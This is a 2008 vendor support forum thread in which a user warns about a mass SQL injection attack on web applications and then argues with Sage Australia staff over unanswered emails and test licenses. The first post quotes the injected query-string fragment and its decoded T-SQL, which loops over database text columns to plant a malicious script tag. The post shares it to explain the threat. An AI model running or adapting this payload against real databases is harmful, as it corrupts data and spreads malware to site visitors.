10-05-2008 05:35 AM - last edited on 10-07-2008 06:59 AM by dlunceford
I've asked Sage Australia twice, but haven't had any reply so far
If not sure what I mean, see these:
http://ppshein.wordpress.com/tag/dos/ - this explains how it works
http://www.dotnetnuke.com:80/Community/Blogs/tabid/825/EntryID/1930/Default.aspx - This one is from the DNN Core team, basically insuring that the framework is secure and to check your legacy modules. It also provided tools to use to check for vulnerabilities and filters.
In short, it’s something like this. They take a legit query string and add there code to it:
253D&tabid=66&mid=376;DECLARE @S CHAR(4000);SET @S=CAST
The hex code translates into this:
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR
FOR select a.name'b.name from sysobjects a'syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=
231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
where '+@C+' not like ''%"></title><script
src="Removed link.!--''')FETCH NEXT
FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE
The JS script they reference in src=lines are actually viruses. As I have some experience with viruses, I attempted to download the js file to look at it. The file never made it, my gateway antivirus flagged it and killed it each time. So I decided to leave well enough alone.
10-07-2008 09:46 AM
Unfortunately, while there are actual tests you can do (has Sage actually tested them), doing this testing is a bit difficult for me ... I only have one APFW license and I can't justify paying for more installing on a test server.
I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails.
10-08-2008 06:40 PM
Who Exactly at Sage Australia did you ask these questions?
I sent email to Kurt and Ken, twice
10-08-2008 06:40 PM
I had a product specialist look into the issue. He tested with what was available to him with the links you posted along with additional research.
10-08-2008 07:23 PM
I have checked with Ken, neither one of us received a email regarding this issue from you.
Can you tell me when you sent it? Or can you resend it to me
As far as licenses go for testing, you would need to buy them or become a ACC which would give you 5 licenses for testing purposes.
10-08-2008 08:13 PM
I sent the email 10:53 on the 25th of Sept and again at 14:05 on the 30th.
I assume you're Kurt? You didn't say in your sig and you aren't using a Sage icon as other Sage staff do.
As to buying licenses to do testing, if Sage want me to do unplaid testing, they would at least supply the licenses. As it stands, I'll let Sage staff do the testing
10-08-2008 09:46 PM
Yes its Kurt,
I keep every email that I receive from you, and I don't have either one from the dates you mentioned, I also checked Kens email and there not in his inbox either.
Mike you make a very strong accusation in your earlier post that we don't respond to your emails.
"I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails"
Mike this is a problem for me as I make sure all of your emails get answered,
Please forward these emails to me so I can make sure the problem gets rectified.